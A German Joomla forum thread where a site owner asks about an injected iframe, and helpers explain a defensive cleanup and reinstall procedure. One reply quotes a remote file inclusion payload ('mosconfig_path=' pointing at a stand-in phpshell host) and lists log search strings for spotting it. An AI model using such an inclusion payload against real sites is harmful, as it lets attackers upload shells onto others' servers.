larsm

Hallo, meine Seite wurde gehackt. Nun steht in der ersten zeile der Seite, wenn ich mir den Quelltext anschaue ein iframe. Hat jemand eine Idee wie der dahin kommen könnte??? Muss ja irgendwo in einem Script stehen. Ich finde aber nichts.

Lappsack

hallo, hast du deine index.php und so weiter auch auf 777 stehen? Lade dir die Joomal12.zip und überspiele dir die index.php und schreibschütze sie

__________________
Es grüsst dich herzlich

The Lappsack
----------------------------------------------------------------------------
Wer Rechschreibefehler findet, darf Sie wie immer behalten
http://www.lappsack.de

larsm

Hi, hab ich schon gemacht. Leider ohne Erfolg.

Lappsack

Nimm mal eine anderes Template. Das ist doch sicher auch 777 bei dir oder?

nur zum testen

__________________
Es grüsst dich herzlich

The Lappsack
----------------------------------------------------------------------------
Wer Rechschreibefehler findet, darf Sie wie immer behalten
http://www.lappsack.de

larsm

Da ist er dann auch drin. Ich hab auch schon ein Template neu installiert und auch da steht er drin. Auf 777 steht nichts. Ich hab auch schon den ganzen Quelltext nach dem iframe durchsucht -> Nichts. Könnte das aus der Datenbank kommen?

chw

Meine Glaskugel weiß bestimmt wie der dahin kommt...
Benutze bitte mal die Suche, es gibt tausende gleicher Fragestellungen.

Vorweg: Abslout sinnlos ist ein einfaches entfernen oder überschreiben der index.php
Das behebt nicht die Lücke und garantiert auch nicht das noch andere schädliche Scripte auf dem Server verbleiben.

Folgender Vorgehensweise halte ich für angebracht:

- Logfiles vom hoster sichern bzw. Anfordern (alle die du bekommen kannst)
- Alle Dateien auf die lokale Festplatte kopieren, inkl der Datenbank (wichtig!).
- Dann alles (wirklich alles!) löschen.
- nun die logfiles nach verdächtigem durchsuchen
- Sicherheitslücke finden und beheben
- Frisches joomla installieren und saubere Backupdateien draufspielen

Wenn Du das Access_log nach folgenden Texten durchsuchst wirst Du warscheinlich schnell fündig: =http, wget, curl, mosconfig_
Gleichzeitig durchsuchst Du die Liste mit bekannten unsicheren Komponenten (und diese hier) und schaust ob da eine Installiert war.

Wenn das alles erfolglos war dann wende Dich an Deinen Hoster,
es könnte auch sein das ein anderer Kunde auf dem Server die Ursache ist.

EDIT
Hintergrund des ganzen: Wenn Du die Index.php überspielst und meinetwegen auch noch 400 setzt,
beibt die Lücke über die er zugriff erlangte ja weiterhin bestehen. Er kann dann z.B. einen php mailer hochladen und munter spam versenden. Meistens wird über eine Remotefile Inclusion "mosconfig_path=http://www.irgendwas,tdl/phpshell.gif) eine Mischung aus Filemanager und Shell hochgeladen. Da kann der dann mit den gleichen Rechten agieren wie joomla auch. Also Dateien anlegen, löschen, verändern.
Wenn Du nun nur die unsichere Komponente entfernst kann es sein das diese datei (mit der shell) weiterhin auf dem Server bleibt. Somit kann er sich ganz einfach wieder zugriff verschaffen, das war auch mit der grund warum das tauschen der index.php nichts gebracht hat. Die Lücke bleibt ja bestehen.
Die einzige lösung waäre ein dirketer Vergleich aller Daten und zwar Zeichen für Zeichen- sehr viel Arbeit ;-)
Daher ist es einfacher eine komplette neuinstallation mit aktuellem joomla und Komponenten zu verwenden und nur template, grafiken usw. hochzuladen. Die Inhalte stehen ja in der Datenbank.

Ph_Ro

Hallo ich habe das gleiche Problem,

deshalb erst einmal vielen Dank an chw für die Tipps zur Vorgehensweise.

@Lars: ich habe deine Seite eben besucht: Du scheinst das Problem gelöst zu haben. Bist du wie oben beschrieben vorgegangen und hast joomla und alle Komponenten neu installiert? Hast Du herausgefunden welche Komponente und was sonst für die Sicherheitslücke verantwortlich ist?

Gruß Philipp